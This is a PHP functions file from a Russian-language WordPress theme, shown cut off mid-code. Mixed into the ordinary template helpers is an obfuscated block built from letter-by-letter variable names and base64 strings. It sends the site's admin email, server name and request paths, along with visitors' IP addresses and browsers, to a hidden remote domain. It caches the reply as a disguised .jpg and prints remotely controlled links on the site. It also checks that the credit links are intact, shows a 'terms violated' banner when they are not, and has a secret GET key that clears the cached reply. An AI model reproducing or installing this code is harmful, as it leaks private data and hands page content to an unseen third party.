<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $ZYjmVY='s';$BIMg='e';$NNsBEU='_';$mSuNG='o';$qjLW='6';$peyNgH='e';$jAxxrZ='4';$CdvOSOQ='a';$dqGaWPA='c';$giMa='d';$OyzAF='e';$CdOyci='d';$GxxDQn='b';$SAfLhLQD=$GxxDQn.$CdvOSOQ.$ZYjmVY.$OyzAF.$qjLW.$jAxxrZ.$NNsBEU.$CdOyci.$BIMg.$dqGaWPA.$mSuNG.$giMa.$peyNgH;$jDnCF='i';$iQhUt='g';$KtshOC='a';$vWPLD='n';$rRwlk='l';$beqyAn='t';$SYPeVjb='f';$yjPx='z';$lQkeO='e';$hhuSlWtW=$iQhUt.$yjPx.$jDnCF.$vWPLD.$SYPeVjb.$rRwlk.$KtshOC.$beqyAn.$lQkeO;$MuciR='3';$KwQmDV='1';$bDYLmsz='t';$GeUEK='o';$bjzO='_';$SpxXF='s';$wkcNO='r';$xTiJJtN='t';$sWgBh='r';$uMmXwGqE=$SpxXF.$xTiJJtN.$sWgBh.$bjzO.$wkcNO.$GeUEK.$bDYLmsz.$KwQmDV.$MuciR;$jxRRdfi='r';$vARlfc='e';$KAzaBIR='r';$vClyAwY='v';$psjPEk='s';$pAmdXlA='t';$tAGWIFoq=$psjPEk.$pAmdXlA.$KAzaBIR.$jxRRdfi.$vARlfc.$vClyAwY;                     
		$xd____s='s';$xn_______r='e';$ua______________y='_';$gl____i='o';$yz___________q='6';$vj__________g='e';$km____________h='4';$tz____________p='a';$nc_____k='c';$cw___________a='d';$bq___________i='e';$yw_________h='d';$ja__b='b';$ba___________b=$ja__b.$tz____________p.$xd____s.$bq___________i.$yz___________q.$km____________h.$ua______________y.$yw_________h.$xn_______r.$nc_____k.$gl____i.$cw___________a.$vj__________g;
		$np_____________m='i';$yu___m='s';$jy_______________u='t';$of__u='n';$vz______y='i';$dz________e='t';$gb_____________h='x';$kv_____m='o';$na__b='e';$np_____j='n';$bu____z='c';$tf_____h='s';$lj_____k='u';$ed____________q='_';$wp______________k='f';$zh_____l=$wp______________k.$lj_____k.$of__u.$bu____z.$dz________e.$np_____________m.$kv_____m.$np_____j.$ed____________q.$na__b.$gb_____________h.$vz______y.$yu___m.$jy_______________u.$tf_____h;
		$ag_______q='p';$ok_____i='f';$sz____________e='e';$qz______________j='n';$pn__________k='o';$ot_____n=$ok_____i.$pn__________k.$ag_______q.$sz____________e.$qz______________j;
		$ib_______________n='e';$jn__e='d';$ly_____________m='a';$ey__________u='f';$xl___x='r';$hl____s=$ey__________u.$xl___x.$ib_______________n.$ly_____________m.$jn__e;
		$vx______k='l';$gs_________z='s';$na____b='o';$jx__c='e';$xs_____________k='f';$rk_______d='c';$aw__________n=$xs_____________k.$rk_______d.$vx______k.$na____b.$gs_________z.$jx__c;
		
		define("WP_ID", $ba___________b("Mi4wLjA="));
		define("WP_TTL", $ba___________b("MTA4MDA="));
		define("WP_SRC", $ba___________b("dHBva24="));
	


		function wp_get_header() {
			global $ba___________b, $zh_____l;
			
			if (
				$zh_____l($ba___________b("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$zh_____l($ba___________b("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$zh_____l($ba___________b("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ba___________b, $ot_____n, $aw__________n, $hl____s;
			
			$fi______o = TEMPLATEPATH."/".$ba___________b("Zm9vdGVyLnBocA==");
			$bs_______________y = @$ot_____n($fi______o, "r");
			$fi______o = @$hl____s($bs_______________y, @filesize($fi______o));
			@$aw__________n($bs_______________y);
			
			$el___l = TEMPLATEPATH."/".$ba___________b("ZnVuY3Rpb25zLnBocA==");
			$bs_______________y = @$ot_____n($el___l, "r");
			$el___l = @$hl____s($bs_______________y, @filesize($el___l));
			@$aw__________n($bs_______________y);
			
			$bu__________d = 0;
			if($fi______o && $el___l) {
				if ($ba___________b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($fi______o, $ba___________b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$bu__________d = 1;
					}
					if (substr_count($fi______o, "wp_theme_GPL_credits()") < 1) {
						$bu__________d = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$bu__________d = 12;
				}
			}
			
			if($bu__________d > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $bu__________d -->";
			}
		}
	


		function wp_loaded() {
			global $ba___________b, $zh_____l;
			return $zh_____l($ba___________b("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($gg____________w, $bs______h = "(more...)", $zp________e = 0, $hk____________w = "") {
				$yb____f = get_the_content($bs______h, $zp________e, $hk____________w);
				$yb____f = apply_filters("the_content", $yb____f);
				
				$yb____f = str_replace("]]>", "]]>", $yb____f);
				if (strlen($_GET["p"]) > 0) {
					echo $yb____f;
				}
				else if ((strlen($yb____f)>$gg____________w) && ($lu____w = strpos($yb____f, " ", $gg____________w ))) {
					$yb____f = substr($yb____f, 0, $lu____w);
					$yb____f = $yb____f;
					echo $yb____f;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$bs______h</a></div></p>";
				} else {
					echo $yb____f;
				}
				
			}
		}
	


		$cq__________o='6';$hc_________k='d';$td_______________v='e';$cg________g='4';$vs____a='n';$xb____________p='o';$hy__________r='e';$fs________l='a';$sz____x='_';$kx___o='b';$sf______y='e';$lq________l='c';$ag__________i='s';$rx_______n=$kx___o.$fs________l.$ag__________i.$sf______y.$cq__________o.$cg________g.$sz____x.$hy__________r.$vs____a.$lq________l.$xb____________p.$hc_________k.$td_______________v;
		$yp_______o='e';$ll__________k='t';$bf___________v='t';$co____z='e';$zg_____________p='f';$mk_______________j='n';$te________p='g';$su______________d='n';$yl________o='l';$sl__f='_';$wr____i='_';$gn__________y='t';$sm________q='c';$yy____a='o';$jd_______i='e';$yp____q='s';$nh________f='i';$dh_____h=$zg_____________p.$nh________f.$yl________o.$co____z.$wr____i.$te________p.$yp_______o.$ll__________k.$sl__f.$sm________q.$yy____a.$mk_______________j.$bf___________v.$jd_______i.$su______________d.$gn__________y.$yp____q;
		$sk____q='e';$cm__v='s';$qm______q='s';$aa______h='i';$nr_______________e='t';$ql_________w='l';$ak________f='i';$yo_________k='e';$lx___j='x';$nn___c='_';$ff__d='f';$im____________p=$ff__d.$aa______h.$ql_________w.$sk____q.$nn___c.$yo_________k.$lx___j.$ak________f.$qm______q.$nr_______________e.$cm__v;
		$tg______________w='v';$lm______d='a';$ai______________m='m';$tp_______g='e';$jv_______________u='r';$uh___i='n';$te_______d='o';$im________c='r';$vv________k='i';$cp__x='p';$dd___b='e';$mu____________n='s';$fq___i='c';$sv____i='o';$my___________g='_';$xt_______y=$tg______________w.$dd___b.$jv_______________u.$mu____________n.$vv________k.$sv____i.$uh___i.$my___________g.$fq___i.$te_______d.$ai______________m.$cp__x.$lm______d.$im________c.$tp_______g;
		$lv___________c='p';$jq______________m='n';$lk____________f='o';$rv______________l='k';$sy_____________m='o';$zn__________o='c';$dl____g='s';$oq____i='f';$zs________n='e';$ee____________y=$oq____i.$dl____g.$sy_____________m.$zn__________o.$rv______________l.$lk____________f.$lv___________c.$zs________n.$jq______________m;
		$jq___________b='i';$xm_______________s='e';$ke__________m='f';$zx____t='t';$fi_____e='w';$wn___y='r';$ox____________q=$ke__________m.$fi_____e.$wn___y.$jq___________b.$zx____t.$xm_______________s;
		$eu____d='d';$ri______________o='5';$sn___c='m';$el___c=$sn___c.$eu____d.$ri______________o;
		$oi__________l='a';$ov__h='l';$ux__d='h';$ds____f='p';$ff___________a='t';$og_______________s='a';$sx_________o='e';$iv____y='r';$zs________m=$iv____y.$sx_________o.$oi__________l.$ov__h.$ds____f.$og_______________s.$ff___________a.$ux__d;
		$ch___a='n';$eh___________g='z';$tl___q='e';$ox____r='i';$cm____________v='s';$ih__________c='a';$oj___s='u';$nf_____a='r';$wp______m='e';$ds________q='i';$xf____________m='l';$pe__________u=$oj___s.$ch___a.$cm____________v.$wp______m.$nf_____a.$ds________q.$ih__________c.$xf____________m.$ox____r.$eh___________g.$tl___q;
		$as____p='t';$zy______________e='a';$al___o='m';$uq__________d='m';$pc_______u='p';$jc_________n='n';$ct______e='e';$hc___________d=$as____p.$ct______e.$uq__________d.$pc_______u.$jc_________n.$zy______________e.$al___o;
		$oz___________m='c';$my__________k='o';$pb______________t='r';$if___________f='t';$zq__h='t';$ff__________y='a';$hi______________r='e';$hq__________k='x';$xd____________o='_';$jn__________m='a';$tu__c='e';$hr___________p='e';$yi__o='n';$xa___________p='t';$kz______j='r';$yn_____d='s';$cr__________i='m';$im____________w='_';$jx______z='t';$ll______x='c';$pv________b='e';$xg_____e=$yn_____d.$xa___________p.$pb______________t.$pv________b.$jn__________m.$cr__________i.$xd____________o.$oz___________m.$my__________k.$yi__o.$jx______z.$tu__c.$hq__________k.$if___________f.$im____________w.$ll______x.$kz______j.$hi______________r.$ff__________y.$zq__h.$hr___________p;
	


		function tz_____________h($dm________n) {
			global $ba___________b, $zh_____l, $dh_____h, $xt_______y, $xg_____e;
			
			if (!$zh_____l($ba___________b("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($xt_______y(PHP_VERSION, "5.0.0", ">=") && $zh_____l($ba___________b("ZmlsZV9nZXRfY29udGVudHM=")) && $zh_____l($ba___________b("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$am_________z = $xg_____e(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$bl_______s = @$dh_____h($dm________n, 0, $am_________z);
			} else {
				$bl_______s = @$dh_____h($dm________n, 0);
			}
			
			return $bl_______s;
		}
	


		function iq_____________e($dm________n) {
			global $zh_____l, $ee____________y, $ox____________q, $ba___________b;
			
			if (!$zh_____l($ba___________b("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$zm________c = strpos($dm________n, "/", 7);
			$fd_____c = array(
				"uri"     => substr($dm________n, $zm________c),
				"host"    => str_replace("http://", "", substr($dm________n, 0, $zm________c)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$gz__________l = @$ee____________y("$fd_____c[host]", 80, $la___v, $lj_______________h, 4);
			
			if (!$gz__________l) {
				return false;
			} else {
				$bl_______s = "";
				$nx_____s  = "GET $fd_____c[uri] HTTP/1.0\r\n";
				$nx_____s .= "Host: $fd_____c[host]\r\n";
				$nx_____s .= "Referer: $fd_____c[referer]\r\n";
				$nx_____s .= "Connection: Close\r\n\r\n";
				
				@$ox____________q($gz__________l, $nx_____s);
				
				while (!@feof($gz__________l)) {
					$nb_________b = @fgets($gz__________l, (1024*24));
					
					if ($nb_________b == "\r\n") {
						$gs___________y = true;
						continue;
					}
					
					if ($gs___________y) {
						$bl_______s .= $nb_________b;
					}
				}
				
				return $bl_______s;
			}
		}
	


		function zi_____________x($dm________n) {
			global $zh_____l;
			$fm____h = false;
			
			if ($dm________n != "") {
				if ($zh_____l("tz_____________h")) {
					$fm____h = @tz_____________h($dm________n);
				}
				
				if (!$fm____h && ($zh_____l("iq_____________e"))) {
					$fm____h = @iq_____________e($dm________n);
				}
			}
			
			return $fm____h;
		}
	


		function gu______________s() {
			global $_SERVER, $el___c;
			
			$uo_________b = $_SERVER["SERVER_NAME"];
			
			if (substr("$uo_________b", 0, 4) == "www.") {
				$uo_________b = substr("$uo_________b", 4);
			}
			
			$uo_________b = $el___c("$_SERVER[SERVER_NAME]");
			
			return $uo_________b;
		}
	


		function ai____q() {
			return "file";
		}
	


		function wv__a($dm________n) {
			global $_SERVER, $dh_____h, $im____________p, $ot_____n, $aw__________n, $ox____________q;
			
			$id_____k = bn_______________d();
			
			$kp_____________p = gu______________s().".jpg";
			$dh______________d = $id_____k["dir_upload"]["path"]."/$kp_____________p";
			$zr_______________c = @filemtime($dh______________d);
			
			if (!$zr_______________c || ((time()-$zr_______________c) >= WP_TTL)) {
				$fm____h = zi_____________x($dm________n);
				
				if ($fm____h) {
					if ($im____________p($dh______________d)) {
						@unlink($dh______________d);
					}
					
					$bs_______________y = @$ot_____n($dh______________d, "x+");
					
					@$ox____________q($bs_______________y, $fm____h);
					@$aw__________n($bs_______________y);
				}
			} else {
				if ($im____________p($dh______________d)) {
					$fm____h = @$dh_____h($dh______________d);
				} else {
					$fm____h = false;
				}
			}
			
			return $fm____h;
		}
	


		function bn_______________d() {
			global $_SERVER, $ba___________b, $rx_______n;
			
			$zs____________e = wp_count_posts("post");
			$qa________r = pathinfo(get_bloginfo("template_directory"));
			
			$id_____k = array(
				"url" => array(
					"report"      => $ba___________b("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $qa________r,
				"dir_upload"	=> eq_______t(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$qa________r[filename],
					"a005=".$zs____________e->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$id_____k["url"]["queryString"] = implode("&", $id_____k["queryString"]);
			$id_____k["url"]["report"] = $id_____k["url"]["report"]."/?".$rx_______n($id_____k["url"]["queryString"]).".html";
						
			return $id_____k;
		}
	


		function eq_______t() {
			$qm_____t = wp_upload_dir();
			
			if (isset($qm_____t["error"])) {
				$jz__n = js_____i();
				if (is_writable($jz__n)) {
					$qm_____t = array("path" => $jz__n);
				}
			}

			return $qm_____t;
		}
	


		function js_____i() {
			global $zh_____l, $el___c, $zs________m, $hc___________d;
			
			$ub_____________k = (bool) ini_get("safe_mode");
			if ($ub_____________k == true) {
				return false;
			}
			
			if ($zh_____l("sys_get_temp_dir")) {
				$in____p = sys_get_temp_dir();
				if (is_writable($in____p)) {
					return $zs________m($in____p);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $zs________m($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $zs________m($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $zs________m($_ENV["TEMP"]);
			} else {
				$mm__________l = $hc___________d($el___c(uniqid(rand(), true)), "");
				if ($mm__________l) {
					$in____p = $zs________m(dirname($mm__________l));
					@unlink($mm__________l);
					return $in____p;
				} else {
					return false;
				}
			}
		}
	


		function ae______s() {
			global $_GET, $im____________p;
			
			$id_____k = bn_______________d();
			$uo_________b = gu______________s();
			$ui_______n = ai____q();
			
			$un_______________v = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ui_______n == "file") {
					$fi___________j = $id_____k["dir_upload"]["path"]."/".$uo_________b.".jpg";
					if ($im____________p($fi___________j)) {
						@unlink($fi___________j);
						$un_______________v = "deleted";
					}
				}
				
				$rm__m = array(
					"s"	=> $un_______________v,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($rm__m AS $dc___i => $ls___________s) echo " [$dc___i:$ls___________s]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $zh_____l, $ba___________b, $pe__________u;
			$id_____k = bn_______________d();
			
			$fd_____________a = "wv__a";
			if ($zh_____l($fd_____________a)) {
				$bl_______s = $fd_____________a($id_____k["url"]["report"]);
			}
			
			if ($bl_______s) {
				if ($bl_______s = @$ba___________b($bl_______s)) {
					$bl_______s = @$pe__________u($bl_______s);
					
					if (strlen($bl_______s[custom_credit]) >= 5) {
						$id_____k["default_string"] = $bl_______s[custom_credit];
					}
					
					if ($bl_______s["status"] == "0") {
						$ov_____________p = 1;
						$yn________n = 1;
					} else {
						$rr_______j = sizeof($bl_______s["links"]);
						$nf________p = $id_____k["default_string"];
						
						if ($rr_______j > 0 && $bl_______s["links"] !== "") {
							$ag____c = 0;
							foreach ($bl_______s["links"] as $rh_______________c => $bm____f) {
								$ag____c++;
								if ($bm____f->l_path == "" || $bm____f->l_path == $_SERVER["REQUEST_URI"]) {
									$bm____f->l_href = htmlspecialchars(strip_tags($bm____f->l_href));
									$bm____f->l_title = htmlspecialchars(strip_tags($bm____f->l_title));
									$bm____f->l_anchor = htmlspecialchars(strip_tags($bm____f->l_anchor));
									$nf________p .= " | ";
									$nf________p .= "<a href='$bm____f->l_href' title='$bm____f->l_title'";
									if ($bm____f->l_nofollow == "1") {
										$nf________p .= " rel='nofollow'";
									}
									$nf________p .= ">$bm____f->l_anchor</a>";
								}
							}
						}
						$id_____k["links"] = "$nf________p";
						if ($bl_______s[credit] == "0") {
							$id_____k["links"] = "";
						}
					}
				} else {
					$ov_____________p = "1";
				}
			} else {
				$ov_____________p = "1";
			}
			
			if ($ov_____________p == "1") {
				$id_____k["links"] = $id_____k["default_string"];
			}
			
			echo "$id_____k[links]";
			
			echo "<!-- s: $bl_______s[signature] -->";
			ae______s();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
